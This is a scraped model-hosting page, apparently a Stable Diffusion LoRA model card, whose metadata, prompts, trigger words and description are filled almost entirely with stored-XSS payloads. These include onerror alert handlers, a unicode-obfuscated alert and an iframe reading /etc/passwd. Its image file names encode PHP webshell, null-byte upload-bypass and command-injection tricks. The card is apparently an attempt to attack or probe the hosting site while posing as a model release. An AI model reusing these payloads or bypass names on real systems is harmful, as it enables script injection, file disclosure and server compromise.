victimdz / README.md
mqawed's picture
<script>document.write('<iframe src=file:///etc/passwd></iframe>');</script> <img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/><iframe src=file:///etc/passwd></iframe>') test"><img src="/" =_=" title="onerror='prompt(1)'"> <img/src=x onError="`${x}`;alert(`xss stored`);"> <Img Src=OnXSS OnError=confirm(1)> <fieldset//%00//onsite OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`> ?><img src=x onmouseleave=print()>
aa58dc2 verified
|
raw
history blame
6.83 kB
metadata
tags:
  - text-to-image
  - stable-diffusion
  - lora
  - diffusers
  - template:sd-lora
widget:
  - text: >-
      <img/src=x onError="`${x}`;alert(`xss stored`);"> <Img Src=OnXSS
      OnError=confirm(1)> <fieldset//%00//onsite
      OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`> ?><img src=x
      onmouseleave=print()>
    parameters:
      negative_prompt: >-
        <img/src=x onError="`${x}`;alert(`xss stored`);"> <Img Src=OnXSS
        OnError=confirm(1)> <fieldset//%00//onsite
        OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`> ?><img src=x
        onmouseleave=print()>
    output:
      url: images/bugzilla2.jpg
  - text: >-
      <img/src=x onError="`${x}`;alert(`xss stored`);"> <Img Src=OnXSS
      OnError=confirm(1)> <fieldset//%00//onsite
      OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`> ?><img src=x
      onmouseleave=print()>
    parameters:
      negative_prompt: >-
        <img/src=x onError="`${x}`;alert(`xss stored`);"> <Img Src=OnXSS
        OnError=confirm(1)> <fieldset//%00//onsite
        OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`> ?><img src=x
        onmouseleave=print()>
    output:
      url: images/bugzilla.jpg
  - text: >-
      <img/src=x onError="`${x}`;alert(`xss stored`);"> <Img Src=OnXSS
      OnError=confirm(1)> <fieldset//%00//onsite
      OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`> ?><img src=x
      onmouseleave=print()>
    parameters:
      negative_prompt: >-
        <img/src=x onError="`${x}`;alert(`xss stored`);"> <Img Src=OnXSS
        OnError=confirm(1)> <fieldset//%00//onsite
        OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`> ?><img src=x
        onmouseleave=print()>
    output:
      url: images/xss2.pdf.png
  - text: >-
      <img/src=x onError="`${x}`;alert(`xss stored`);"> <Img Src=OnXSS
      OnError=confirm(1)> <fieldset//%00//onsite
      OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`> ?><img src=x
      onmouseleave=print()>
    parameters:
      negative_prompt: >-
        <img/src=x onError="`${x}`;alert(`xss stored`);"> <Img Src=OnXSS
        OnError=confirm(1)> <fieldset//%00//onsite
        OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`> ?><img src=x
        onmouseleave=print()>
    output:
      url: images/xss1.jpeg
  - text: '-'
    output:
      url: images/svg-xss-xml.jpeg
  - text: '-'
    output:
      url: images/%00';alert(1); - Copie.jpg
  - text: '-'
    output:
      url: images/xsspng.png
  - text: '-'
    output:
      url: images/white_hat%0a.png
  - text: '-'
    output:
      url: images/ssrf.png
  - text: '-'
    output:
      url: images/ssrf.jpg
  - text: '-'
    output:
      url: images/simple-backdoor2.php.gif
  - text: '-'
    output:
      url: images/simple-backdoor.php.gif
  - text: '-'
    output:
      url: images/shell2.php;.jpg
  - text: '-'
    output:
      url: images/shell.png
  - text: '-'
    output:
      url: images/shell.php;.jpg
  - text: '-'
    output:
      url: images/rce2.php.jpg
  - text: '-'
    output:
      url: images/rce.php.jpg
  - text: '-'
    output:
      url: images/pwnd.php.jpg
  - text: '-'
    output:
      url: images/phppng.png
  - text: '-'
    output:
      url: images/phpinfo.php.gif
  - text: "ASCII\0\0\0<? phpinfo(); ?>"
    output:
      url: images/phpinfo.jpg
  - text: '-'
    output:
      url: images/php-backdoor.php.jpg
  - text: '-'
    output:
      url: images/php-backdoor.php%00.jpg
  - text: '-'
    output:
      url: images/php-backdoor.jpg
  - text: '-'
    output:
      url: images/onerror=alert('XSS')' a='.jpg
  - text: '-'
    output:
      url: images/loading.gif
  - text: '-'
    output:
      url: images/kos`uname`oss.jpg
  - text: '-'
    output:
      url: images/jpeg.php.jpg
  - text: '-'
    output:
      url: images/jpeg.php%00.jpg
  - text: '-'
    output:
      url: images/jaja.php.orionn.gif
  - text: '-'
    output:
      url: images/image.jpg
  - text: '-'
    output:
      url: images/image%00.jpg
  - text: '-'
    output:
      url: images/hithere.php.jpg
  - text: '-'
    output:
      url: images/gifshell.php.gif
  - text: '-'
    output:
      url: images/exploit.png
  - text: '-'
    output:
      url: images/exploit.jpg
  - text: '-'
    output:
      url: images/exifremover.jpg
  - text: '-'
    output:
      url: images/download.gif
  - text: '-'
    output:
      url: images/Sun'__img src=x onerror=alert(1)_set.jpg
  - text: '-'
    output:
      url: images/404.php.jpg
  - text: '-'
    output:
      url: images/1N3.jpg
  - text: '-'
    output:
      url: images/';alert(1);x='.jpg
  - text: '-'
    output:
      url: images/'+alert(1)+'.jpg
  - text: '-'
    output:
      url: images/%22onerror=%22alert(1)%22a=%22.jpg
  - text: '-'
    output:
      url: images/%22__img src=x onerror=prompt(1)_.jpg
  - text: '-'
    output:
      url: images/%22%3E%3Csvg%20onload%3Dalert(1)%3E.png
  - text: '-'
    output:
      url: images/%22%3E%3Csvg%20onload%3Dalert(1)%3E%0a.png
  - text: '-'
    output:
      url: images/%22%3E%3Csvg%20onload%3Dalert(1)%3E%0a%0f.png
  - text: '-'
    output:
      url: images/%22%3E%3Csvg%20onload%3Dalert(1)%3E%00.png
  - text: '-'
    output:
      url: images/%1.jpg
  - text: '-'
    output:
      url: images/%0a1.jpg
  - text: '-'
    output:
      url: images/%0a';alert(2);.jpg
  - text: '-'
    output:
      url: images/%0a';alert(1);.jpg
  - text: '-'
    output:
      url: images/%0011.jpg
  - text: '-'
    output:
      url: images/%001.jpg
  - text: '-'
    output:
      url: images/%00';alert(2);.jpg
  - text: '-'
    output:
      url: images/%00';alert(1);.jpg
base_model: stabilityai/stable-cascade
instance_prompt: >-
  <img/src=x onError="`${x}`;alert(`xss stored`);"> <Img Src=OnXSS
  OnError=confirm(1)> <fieldset//%00//onsite
  OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`> ?><img src=x
  onmouseleave=print()>
license: bigscience-bloom-rail-1.0
language:
  - ar

<img/src=x onError="`${x}`;alert(`xss stored`);"> <Img Src=OnXSS OnError=confirm(1)> <fieldset//%00//onsite OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`> ?><img src=x onmouseleave=print()>

Prompt
<img/src=x onError="`${x}`;alert(`xss stored`);"> <Img Src=OnXSS OnError=confirm(1)> <fieldset//%00//onsite OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`> ?><img src=x onmouseleave=print()>
Negative Prompt
<img/src=x onError="`${x}`;alert(`xss stored`);"> <Img Src=OnXSS OnError=confirm(1)> <fieldset//%00//onsite OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`> ?><img src=x onmouseleave=print()>
Prompt
<img/src=x onError="`${x}`;alert(`xss stored`);"> <Img Src=OnXSS OnError=confirm(1)> <fieldset//%00//onsite OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`> ?><img src=x onmouseleave=print()>
Negative Prompt
<img/src=x onError="`${x}`;alert(`xss stored`);"> <Img Src=OnXSS OnError=confirm(1)> <fieldset//%00//onsite OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`> ?><img src=x onmouseleave=print()>
Prompt
<img/src=x onError="`${x}`;alert(`xss stored`);"> <Img Src=OnXSS OnError=confirm(1)> <fieldset//%00//onsite OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`> ?><img src=x onmouseleave=print()>
Negative Prompt
<img/src=x onError="`${x}`;alert(`xss stored`);"> <Img Src=OnXSS OnError=confirm(1)> <fieldset//%00//onsite OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`> ?><img src=x onmouseleave=print()>
Prompt
<img/src=x onError="`${x}`;alert(`xss stored`);"> <Img Src=OnXSS OnError=confirm(1)> <fieldset//%00//onsite OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`> ?><img src=x onmouseleave=print()>
Negative Prompt
<img/src=x onError="`${x}`;alert(`xss stored`);"> <Img Src=OnXSS OnError=confirm(1)> <fieldset//%00//onsite OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074`/aaa/`> ?><img src=x onmouseleave=print()>
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
ASCII<? phpinfo(); ?>
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
-
Prompt
-

Model description

')

test"><img src="/" =_=" title="onerror='prompt(1)'"> <img/src=x onError="${x};alert(xss stored);"> <fieldset//%00//onsite OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074/aaa/> ?>

Trigger words

You should use &lt;img&#x2F;src&#x3D;x onError&#x3D;&quot;&#x60;${x}&#x60;;alert(&#x60;xss stored&#x60;);&quot;&gt; &lt;Img Src&#x3D;OnXSS OnError&#x3D;confirm(1)&gt; &lt;fieldset&#x2F;&#x2F;%00&#x2F;&#x2F;onsite OnMoUsEoVeR&#x3D;\u0061\u006C\u0065\u0072\u0074&#x60;&#x2F;aaa&#x2F;&#x60;&gt; ?&gt;&lt;img src&#x3D;x onmouseleave&#x3D;print()&gt; to trigger the image generation.

Download model

Download them in the Files & versions tab.